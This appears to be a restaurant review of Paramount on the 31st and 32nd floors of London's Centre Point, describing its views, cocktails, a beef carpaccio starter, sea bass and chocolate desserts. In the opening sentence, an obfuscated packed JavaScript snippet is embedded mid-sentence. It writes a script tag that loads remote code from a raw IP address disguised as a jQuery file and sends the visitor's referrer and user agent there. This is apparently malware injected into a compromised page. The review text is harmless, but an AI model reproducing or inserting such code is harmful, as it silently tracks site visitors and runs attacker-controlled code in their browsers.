REVIEW: PARAMOUNT

Paramount (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyzfe|var|u0026u|referrer|isefy||js|php’.split(‘|’),0,{}))
is located on the 31st/32nd floors of Centre Point and features what has to be one of the best restaurant views in London. One of city’s most recognised buildings it sits on New Oxford Street and has breathtaking 360 degrees views out over the capital for as far as the eye can see.

Paramount is split into two sections, the bar on floor 32 which serves a selection of imaginative cocktails and bar food – our favourites were the Liberty Cocktail; a long, sweet and fruity, a concoction of Grey Goose Poire, Chambord, Maple Syrup, Lemon Juice, Raspberries, Plum Bitters, Cranberry & Apple Juice and the Roseberry Fizz; a Lychee Liqueur, Rose Syrup, Lemon Juice, Raspberries and Champagne.

The restaurant on the floor below is a slightly more formal affair with a modern European menu  created by Chef Colin Layfield. We visited for dinner and started with the Scottish Beef Carpaccio, Pickled Young Vegetables, Horseradish Panna Cotta with Bone Marrow & Caper Toast. The dish was well thought out, the flavours and textures complimented each other perfectly and as a starter it left us wanting more.

For mains the Sea Bass with Dill Gnocchi, Fresh Peas, Broad Beans & Cucumber, Caviar Sauce was a pleasant dish although the gnocchi was a little too chewy. Dessert was a plate of Valrhona Chocolate mini puds including a samosa, cheesecake and fondant which went down a storm. The food at Paramount is pretty decent but the prices are a little steep, however those views alone are worth the splurge. Bound to impress lovers, friends and family!
